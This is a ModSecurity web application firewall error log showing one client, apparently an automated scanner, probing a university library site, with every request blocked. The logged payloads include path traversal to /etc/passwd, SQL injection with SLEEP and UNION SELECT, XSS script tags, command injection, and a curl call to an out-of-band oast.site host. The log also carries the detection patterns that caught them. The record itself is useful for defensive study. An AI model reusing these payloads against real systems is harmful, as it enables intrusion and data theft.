[Tue Aug 29 11:39:36.481334 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAXVy2EAAAAB"]
[Tue Aug 29 11:39:48.047214 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAXQKIgAAAAj"]
[Tue Aug 29 11:39:56.418753 2023] [:error] [pid 1701] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAali04AAAAs"]
[Tue Aug 29 11:40:01.382426 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gt897eqj1wc8dm.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12ocCo-f0AAAcPiu8AAAAa"]
[Tue Aug 29 11:40:07.376014 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAcVJPQAAAAB"]
[Tue Aug 29 11:40:07.405596 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAaJJ28AAAAJ"]
[Tue Aug 29 11:40:08.418153 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO12qMCo-f0AAAcjAg8AAAAw"]
[Tue Aug 29 11:40:12.491336 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAXbcKoAAAAL"]
[Tue Aug 29 11:40:21.450141 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAcPiwMAAAAa"]
[Tue Aug 29 11:40:22.619352 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAYf-GIAAAAD"]
[Tue Aug 29 11:40:32.417702 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAcYU2oAAAAp"]
[Tue Aug 29 11:40:33.364346 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAYf-HMAAAAD"]
[Tue Aug 29 11:40:36.488373 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAcbR-AAAAAv"]
[Tue Aug 29 11:40:37.375357 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAcqJD4AAAAG"]
[Tue Aug 29 11:40:39.515070 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAaHMesAAAAE"]
[Tue Aug 29 11:40:40.360266 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAaHMe0AAAAE"]
[Tue Aug 29 11:40:44.435450 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAYf-JMAAAAD"]
[Tue Aug 29 11:40:44.638812 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAXbcOcAAAAL"]
[Tue Aug 29 11:40:46.399157 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAaHMgMAAAAE"]
[Tue Aug 29 11:40:50.370463 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAaZ9j0AAAAo"]
[Tue Aug 29 11:40:50.392926 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcYU5QAAAAp"]
[Tue Aug 29 11:40:53.595080 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEYAAAAH"]
[Tue Aug 29 11:40:55.460216 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcvBbEAAAAJ"]
[Tue Aug 29 11:40:58.379254 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcYU6sAAAAp"]
[Tue Aug 29 11:40:58.407882 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcjAlwAAAAw"]
[Tue Aug 29 11:40:58.428767 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcbSBMAAAAv"]
[Tue Aug 29 11:40:59.353136 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ghnipr3km5uu58.oast.site found within TX:1: cjmnbitjmimt14dgn26ghnipr3km5uu58.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAYf-LUAAAAD"]
[Tue Aug 29 11:40:59.416613 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcbSBgAAAAv"]
[Tue Aug 29 11:41:00.359873 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAYMWTYAAAAR"]
[Tue Aug 29 11:41:00.400378 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcYU7YAAAAp"]
